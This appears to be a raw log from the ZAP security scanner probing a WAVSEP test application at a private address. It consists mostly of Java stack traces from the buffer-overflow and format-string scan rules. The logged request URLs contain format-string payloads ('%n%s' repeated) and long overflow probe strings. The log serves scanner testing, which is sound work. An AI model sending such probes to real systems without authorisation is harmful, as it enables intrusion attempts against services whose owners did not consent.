KsguyxgLdyeALlQfPjRTVwaLLImXELfSOLgCdtxGOpLIUyhZmeRnLfvAUhtZrJOFedvKWnsxHCeTcbDLbJdHlHJJpsTBlvJWPGmfgYXVRAyOrOeLnvmBOhCVANmXDmpCCftymAkbJMPllNQOfWlRBiYAYUIsrGfywjSNPsgDKHTXNCobokvfpyhHAjGjqfHtbvdowcwmKkwKcEIyLyKHXEhCjnAJYuMgmZCRwVAautRDXVDOMEJnDNJEPnbRnlBCZNihCHOEokhWlxhiWenlRImrHIUBdsqfbXQbcgfiFnaUwEJNHlXRIMIACNmTyyZBlBJdBbhhSNJBcYRpZtGAOItFhkFwrcKECjmkOvFglXypxtlnMyAh at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:178) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.BufferOverflow.scan(BufferOverflow.java:130) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 5420368 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrules.BufferOverflow - uyPRZNTjNWKqvcxuDqfNiyATKEuvDrQGQTLcbytJYrCwqSLEigSHQfGHVlVjLAJqROolZNlyeTgLDAcAQkftWgauoNqnoyYrnGNuTxrQVnuCXGAHHHvALqjmFRixSoTOQyAZpWIKARvIpDdAtQQespXDRwMoaCGSsQFHVarZQCrTLfcjSEiaMuRXiBwMinipJXpUfykGMxSJcuFGilAVYKWlCHwINHYDdlYUgwwtohMbWcvgReDPWAfJVbLPfnVbHgemhLcJAQggudPpfwwjoWWiQpbNTTcwgvcAoXayRHQbsrtZhuulPyrqmcVpcHYKqqJDYydMcCruWKHleaAMOqZertJZGYCyZDxmSBcegjeirsPFPxktxNYdaNYXokuEoEEsVxhqZijcwnyFwIrUqBmQdeHgTvJymQVceVoyWeTJJcrKZKYhlilAjOsngrgCdqpEogiNwDVBDKYQdfDGwYAyoaYiNQZLigecVHSyGGHWiGnJdsmrjAbPAHtnhSsBkvoFlIvgICEJhLXNGEdaPvyhntALmLOTrwUpGDsViQRTBGaiaUnsJkdQRZLyJPjLWmDwgcCtEpYjgTrhvWjnPZARfqWloVDlYWQUIfKAhCFJpMuwJreEJDSCGaTGDRONCDBXDxUNOaUnjHRxTBGdepUlgxfSQtToqKXwVoBhYySWjqOTVTvhNybZSTgGJTHqDsabyjXnCbnbgKLmKgqpMSMsREjTbyfrXLIjpRvknSuCTslYVvJuMQtirTOpQKjfhjCEaRgMhSchxmYQEAdlFwjVVkcKpoDBwkUJWEyDBfdagPTvOrRGKHpquplbOQOcSvmmXcxVQjbyrYnuoPTCsBJkOxUwduPLGxBPVtEuAWjRHHCTffcdROXKGamEyoBovvOdYtUtixtTEjubEAarlBfeceIVKQjvcjBOdaexBNebQRwTcPLfwGQwceLOHCLCOkImXPnOUvBnMAbrsolKNycKCgqQtVlybTUgVwCbqUJCHYxFFvVZcvfoGZKWVPTyQMNssxlcswDUmeGLEWfTbrPuADpaoCATqcEkWQBFvDHEJmgvscVeeQtXbGBCBIjTCWtIRKLefLobHeEfyiIIAQbFcEgNPwifvQoatPhpsryoABZGUmKwsltDPoZuGgAOetLvUopAwlIppCxyQrZTEKZDshnAtdEEZXuOjHEVZZLMGlHJIlVomYlOdwPfejYhbrtrUbLHKbMqhFZXmRMSwyMxkKUsauhvtaOwQsRsVASZOicuTeCEStZvHAeVxWOHrcWacnScIiLxCGPnDJXYZecFSVVfVIIpbvroSVrZjLqKoatPxQjJfTwcaEirFnpphrvoxCjPrDAYkQvxAKQfWvdwCkFqoRnvgCnlYkRLRhFGSElFZwKiNUxniBNcaLbHlkevtHrpiXwCIVGoULJfHqcOHbOZmmUHdvFjXBhUMpSbwpHiVDgeRLJmAVOCQWsiMPXTmvAgyeNRZXlsbuqRGISghryHNTrbSkrHxebCLDDAPIQQWmkXapjyNWtKnxORiAFhTdepKNyAYtWvwqetdXfNvUUskkPFImcCnRgGHJycOnMKVmFtpymCHfPABEEiLrykfyBkYuJiVUeNZVXstDUFPGJkFlkIWNwEAoVJNRuTqpphixqEpLcgwACIwdcJkhyULtxXMPYFYAFbpkHNDHsqBFVBfoWajPJNHZttXOVslLKQuTAotTUXOwouPotGQKlKeypxJoQYPDWLsxNGmVhSoivtZkYaTlBdbgFpOmnxKuigrwFfkHomBEZaKkYneNtQiYGQClxbuLEHDXqbaOVhqHDQXcyJWvmQigpMpXOeeJjRTAgrwmduSkqlDJCDYxrugXbSFxoZBYdZwVsjOsTkZCcshtPRbhAiYZZxrFajGJRKqRJTQnbbJtFgYGHoemKPvscFZEhhNUNhMktMvePHXgedEEcPMrmKEVddQocCPSIaOkPwnyUDXckMdQfITIysatXpYpuLDjkfYZJpTHidHlApeQUlaMVKLbchlcJqAPBfikdYxxCxvuBDTKfVwTFTpEVTkgsLJCGMMymFNhZbngQDsAkTnaesrFvYGifPScMwlTZB java.net.UnknownHostException: uyPRZNTjNWKqvcxuDqfNiyATKEuvDrQGQTLcbytJYrCwqSLEigSHQfGHVlVjLAJqROolZNlyeTgLDAcAQkftWgauoNqnoyYrnGNuTxrQVnuCXGAHHHvALqjmFRixSoTOQyAZpWIKARvIpDdAtQQespXDRwMoaCGSsQFHVarZQCrTLfcjSEiaMuRXiBwMinipJXpUfykGMxSJcuFGilAVYKWlCHwINHYDdlYUgwwtohMbWcvgReDPWAfJVbLPfnVbHgemhLcJAQggudPpfwwjoWWiQpbNTTcwgvcAoXayRHQbsrtZhuulPyrqmcVpcHYKqqJDYydMcCruWKHleaAMOqZertJZGYCyZDxmSBcegjeirsPFPxktxNYdaNYXokuEoEEsVxhqZijcwnyFwIrUqBmQdeHgTvJymQVceVoyWeTJJcrKZKYhlilAjOsngrgCdqpEogiNwDVBDKYQdfDGwYAyoaYiNQZLigecVHSyGGHWiGnJdsmrjAbPAHtnhSsBkvoFlIvgICEJhLXNGEdaPvyhntALmLOTrwUpGDsViQRTBGaiaUnsJkdQRZLyJPjLWmDwgcCtEpYjgTrhvWjnPZARfqWloVDlYWQUIfKAhCFJpMuwJreEJDSCGaTGDRONCDBXDxUNOaUnjHRxTBGdepUlgxfSQtToqKXwVoBhYySWjqOTVTvhNybZSTgGJTHqDsabyjXnCbnbgKLmKgqpMSMsREjTbyfrXLIjpRvknSuCTslYVvJuMQtirTOpQKjfhjCEaRgMhSchxmYQEAdlFwjVVkcKpoDBwkUJWEyDBfdagPTvOrRGKHpquplbOQOcSvmmXcxVQjbyrYnuoPTCsBJkOxUwduPLGxBPVtEuAWjRHHCTffcdROXKGamEyoBovvOdYtUtixtTEjubEAarlBfeceIVKQjvcjBOdaexBNebQRwTcPLfwGQwceLOHCLCOkImXPnOUvBnMAbrsolKNycKCgqQtVlybTUgVwCbqUJCHYxFFvVZcvfoGZKWVPTyQMNssxlcswDUmeGLEWfTbrPuADpaoCATqcEkWQBFvDHEJmgvscVeeQtXbGBCBIjTCWtIRKLefLobHeEfyiIIAQbFcEgNPwifvQoatPhpsryoABZGUmKwsltDPoZuGgAOetLvUopAwlIppCxyQrZTEKZDshnAtdEEZXuOjHEVZZLMGlHJIlVomYlOdwPfejYhbrtrUbLHKbMqhFZXmRMSwyMxkKUsauhvtaOwQsRsVASZOicuTeCEStZvHAeVxWOHrcWacnScIiLxCGPnDJXYZecFSVVfVIIpbvroSVrZjLqKoatPxQjJfTwcaEirFnpphrvoxCjPrDAYkQvxAKQfWvdwCkFqoRnvgCnlYkRLRhFGSElFZwKiNUxniBNcaLbHlkevtHrpiXwCIVGoULJfHqcOHbOZmmUHdvFjXBhUMpSbwpHiVDgeRLJmAVOCQWsiMPXTmvAgyeNRZXlsbuqRGISghryHNTrbSkrHxebCLDDAPIQQWmkXapjyNWtKnxORiAFhTdepKNyAYtWvwqetdXfNvUUskkPFImcCnRgGHJycOnMKVmFtpymCHfPABEEiLrykfyBkYuJiVUeNZVXstDUFPGJkFlkIWNwEAoVJNRuTqpphixqEpLcgwACIwdcJkhyULtxXMPYFYAFbpkHNDHsqBFVBfoWajPJNHZttXOVslLKQuTAotTUXOwouPotGQKlKeypxJoQYPDWLsxNGmVhSoivtZkYaTlBdbgFpOmnxKuigrwFfkHomBEZaKkYneNtQiYGQClxbuLEHDXqbaOVhqHDQXcyJWvmQigpMpXOeeJjRTAgrwmduSkqlDJCDYxrugXbSFxoZBYdZwVsjOsTkZCcshtPRbhAiYZZxrFajGJRKqRJTQnbbJtFgYGHoemKPvscFZEhhNUNhMktMvePHXgedEEcPMrmKEVddQocCPSIaOkPwnyUDXckMdQfITIysatXpYpuLDjkfYZJpTHidHlApeQUlaMVKLbchlcJqAPBfikdYxxCxvuBDTKfVwTFTpEVTkgsLJCGMMymFNhZbngQDsAkTnaesrFvYGifPScMwlTZB at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:178) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.BufferOverflow.scan(BufferOverflow.java:130) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 5420368 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrules.BufferOverflow - hSOuXrhogFKTuITddmMgJLHFnmfDxQuInWxNPFMaxCvJdQEtlFtpgxKxiiqgUMcXAQoeYDcWjpcbHgiKgmDBuJAMyFaVQUnVMfyKxmgjDIEZZxyruTikCUeJYcLLKsaNFTnxOQKCsrvPFaEfuQPigiJsVSyqQkAhaliaqNFGgHTmYxvKutdvONVfnODrqARYAbJDdipwnmiaHUlBBIIWvWHBZOFImaBwQgDRSOVHwauLdUJyZPtGqtROTTCwNYlqhZohePLPXnMveokfvKeIpiqXArtSurZfutvgZRRyyFWSpDKhuEAZrCPyaMMyBZqfXGKUYnNmcsywfhuwLptDqOpnTeEbdGoJuKWtQxaumwYNQaPHSmrDRBcunyWvZxRFYcXTxHctxjAeShDTJgnoajXAexaJjfcustFSZTwEtWXiXwmpHOStyawUqXVIqmBYNYfCJmXnuFGmbQyBOpvDPiZfjnUAfSfQgQqKejcvNdIkkTyAMmHJBlUpULsHmsOQuDUJIiLVjMUjrQBJekpwnAqSZsYMyaZePemoUybLPmvFwqsCRvcMsRaCbdvDLFDlcKlquIFCOBdasXgWfhDvLpPRfHVpbonHhHdtjuqSZyTtfDZMqOfHwmWMOOBXGNsBlfRNeRdEkTuCvYMsSjwIZolayLIkBWQksIdVHMsHHijNKqCwAScRxppbYrSgowIhdkiaYWHyNrZfUrAdpilsUDXlkskbuGSrAdpSeHMxVSsSTShxZBaVhxtanVmYJNkwTwigvKsHwuFwaFBSqXbeeFxNRtMwyUAwugpWNMmjJxNkLdvYGeGGDBZCwRbYnchesZExqphISwVOcuLBwYsmGwbwlVuEDkrTnTrIWSOjobSHLUCVPGlOECLQxZRYxaYmJrJTUlIGipaMWCToChjZAQyGuLnaYPMDKLsbZVgMlPdaoBohYmDOSCAFwhZFuDbYebwrYkyGMAoFOocTsKailSkQKmOPQZFtHbhuUcKHVvCQrhWwUoyJROBGmObEjCPoSkRXOMmWdTIwnoBcZrnRkKpdXOMXkTmWaiVfkttwqSDmiTBiKgbgBRYLIiwbAOAMYLkoDUujFnroYjPYbbaiOmEgrZBdkvutZSiFYMpmVIfEeEGaVJSCGiQNFRrsZHKbBfOaKTknUsoLUcektZqWqsylFMUPJdabynRnKFSpekTpxJSiNLTyXOWBTJCuGvGvOaDETxIAyBpeVDgsjieCTHrvMkFSMxwqMZBWSCoktbVMswFQrwKZRcIiexFkNXnphnGdIuQMfqujHMJHxHeCANDBPvwkdGWyGWeVfrBMtnuniFqOPltdXmVEJmIDVArAWyEopcbQkrkfNPkeRfudhfNZNxBqFFGaROXqAeYTVLLVOrmBZvchKZGFEMUbLvvLxbBEBffaWxLsgCyGdcfkxPleIrfrRlBEKLerdHiDmHSmuVDhYZIXTTEPScRTCyAlBJkDBvElqbjfGoSiqYFAhkmpQdwyWhlxnKqwADWXTwgshVKSiOsKZsHaBaLvJKxiSyEJneDfwrbMOFfluUJthJsQvVIVenclFyiFMquKxsDpaErWGkvYqnHttLSOFtFYceSptBwyKjDDLrUAnYyuMJSOSBbXHiWAYMsFcDHZQTDqADnuSIqeIYgAmPnobJTbuULWTJKrDnTtfCGUexkuhgywFxYCqUjZPbmPXDLFamuMcGJiRqfKiUbQCdUCYIbQWyVtuViFCGQlokPZPuuwjjPXqEuQWjWYjEwrsTLCUqQwdfFbTGQnoxTkltdlBHVKVguOOrkyiMorDyWrwEiReyOOOatUDmtZTfPsZGrWEnkOApwdytELmQIWTmeuuBpIYpPOvpUSYLpIesMnuaErAFpchUwSFCKMuAVFMBjjjDdOKihgQSVHHmEjkNmeerWQMwIxZGcyVPLOJcDlJBSHfwjvcunEjeETxcibQNbxUyhvKOqnqxMjeMOHymMTnbglQvOXWYPMJBBrhNrexqFscsVtaHKRKeXPAgFWLGiLncFATagYvNdCRiQHuovHAshajWbZdRxXLhgfnSSqJYeXZnxjXQftLhRZSkmOHBxZUhYNFZCYtthO java.net.UnknownHostException: hSOuXrhogFKTuITddmMgJLHFnmfDxQuInWxNPFMaxCvJdQEtlFtpgxKxiiqgUMcXAQoeYDcWjpcbHgiKgmDBuJAMyFaVQUnVMfyKxmgjDIEZZxyruTikCUeJYcLLKsaNFTnxOQKCsrvPFaEfuQPigiJsVSyqQkAhaliaqNFGgHTmYxvKutdvONVfnODrqARYAbJDdipwnmiaHUlBBIIWvWHBZOFImaBwQgDRSOVHwauLdUJyZPtGqtROTTCwNYlqhZohePLPXnMveokfvKeIpiqXArtSurZfutvgZRRyyFWSpDKhuEAZrCPyaMMyBZqfXGKUYnNmcsywfhuwLptDqOpnTeEbdGoJuKWtQxaumwYNQaPHSmrDRBcunyWvZxRFYcXTxHctxjAeShDTJgnoajXAexaJjfcustFSZTwEtWXiXwmpHOStyawUqXVIqmBYNYfCJmXnuFGmbQyBOpvDPiZfjnUAfSfQgQqKejcvNdIkkTyAMmHJBlUpULsHmsOQuDUJIiLVjMUjrQBJekpwnAqSZsYMyaZePemoUybLPmvFwqsCRvcMsRaCbdvDLFDlcKlquIFCOBdasXgWfhDvLpPRfHVpbonHhHdtjuqSZyTtfDZMqOfHwmWMOOBXGNsBlfRNeRdEkTuCvYMsSjwIZolayLIkBWQksIdVHMsHHijNKqCwAScRxppbYrSgowIhdkiaYWHyNrZfUrAdpilsUDXlkskbuGSrAdpSeHMxVSsSTShxZBaVhxtanVmYJNkwTwigvKsHwuFwaFBSqXbeeFxNRtMwyUAwugpWNMmjJxNkLdvYGeGGDBZCwRbYnchesZExqphISwVOcuLBwYsmGwbwlVuEDkrTnTrIWSOjobSHLUCVPGlOECLQxZRYxaYmJrJTUlIGipaMWCToChjZAQyGuLnaYPMDKLsbZVgMlPdaoBohYmDOSCAFwhZFuDbYebwrYkyGMAoFOocTsKailSkQKmOPQZFtHbhuUcKHVvCQrhWwUoyJROBGmObEjCPoSkRXOMmWdTIwnoBcZrnRkKpdXOMXkTmWaiVfkttwqSDmiTBiKgbgBRYLIiwbAOAMYLkoDUujFnroYjPYbbaiOmEgrZBdkvutZSiFYMpmVIfEeEGaVJSCGiQNFRrsZHKbBfOaKTknUsoLUcektZqWqsylFMUPJdabynRnKFSpekTpxJSiNLTyXOWBTJCuGvGvOaDETxIAyBpeVDgsjieCTHrvMkFSMxwqMZBWSCoktbVMswFQrwKZRcIiexFkNXnphnGdIuQMfqujHMJHxHeCANDBPvwkdGWyGWeVfrBMtnuniFqOPltdXmVEJmIDVArAWyEopcbQkrkfNPkeRfudhfNZNxBqFFGaROXqAeYTVLLVOrmBZvchKZGFEMUbLvvLxbBEBffaWxLsgCyGdcfkxPleIrfrRlBEKLerdHiDmHSmuVDhYZIXTTEPScRTCyAlBJkDBvElqbjfGoSiqYFAhkmpQdwyWhlxnKqwADWXTwgshVKSiOsKZsHaBaLvJKxiSyEJneDfwrbMOFfluUJthJsQvVIVenclFyiFMquKxsDpaErWGkvYqnHttLSOFtFYceSptBwyKjDDLrUAnYyuMJSOSBbXHiWAYMsFcDHZQTDqADnuSIqeIYgAmPnobJTbuULWTJKrDnTtfCGUexkuhgywFxYCqUjZPbmPXDLFamuMcGJiRqfKiUbQCdUCYIbQWyVtuViFCGQlokPZPuuwjjPXqEuQWjWYjEwrsTLCUqQwdfFbTGQnoxTkltdlBHVKVguOOrkyiMorDyWrwEiReyOOOatUDmtZTfPsZGrWEnkOApwdytELmQIWTmeuuBpIYpPOvpUSYLpIesMnuaErAFpchUwSFCKMuAVFMBjjjDdOKihgQSVHHmEjkNmeerWQMwIxZGcyVPLOJcDlJBSHfwjvcunEjeETxcibQNbxUyhvKOqnqxMjeMOHymMTnbglQvOXWYPMJBBrhNrexqFscsVtaHKRKeXPAgFWLGiLncFATagYvNdCRiQHuovHAshajWbZdRxXLhgfnSSqJYeXZnxjXQftLhRZSkmOHBxZUhYNFZCYtthO at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:178) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.BufferOverflow.scan(BufferOverflow.java:130) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 5428614 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - completed host/plugin http://172.17.0.2:8080 | BufferOverflow in 149.346s 5428615 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - start host http://172.17.0.2:8080 | FormatString strength LOW threshold MEDIUM 5519721 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrules.FormatString - Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/ZAP%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/ZAP%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.FormatString.scan(FormatString.java:179) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid URL encoding: not a valid digit (radix 16): 110 at org.apache.commons.httpclient.URI.decode(URI.java:1775) at org.apache.commons.httpclient.URI.decode(URI.java:1731) at org.apache.commons.httpclient.URI.getPath(URI.java:3108) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) ... 17 more 5533023 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrules.FormatString - Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/ZAP%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/ZAP%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.FormatString.scan(FormatString.java:179) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid URL encoding: not a valid digit (radix 16): 110 at org.apache.commons.httpclient.URI.decode(URI.java:1775) at org.apache.commons.httpclient.URI.decode(URI.java:1731) at org.apache.commons.httpclient.URI.getPath(URI.java:3108) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) ... 17 more 5565723 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrules.FormatString - Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ZAP%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ZAP%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.FormatString.scan(FormatString.java:179) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid URL encoding: not a valid digit (radix 16): 110 at org.apache.commons.httpclient.URI.decode(URI.java:1775) at org.apache.commons.httpclient.URI.decode(URI.java:1731) at org.apache.commons.httpclient.URI.getPath(URI.java:3108) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) ... 17 more 5565724 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrules.FormatString - Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ZAP%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s%n%s 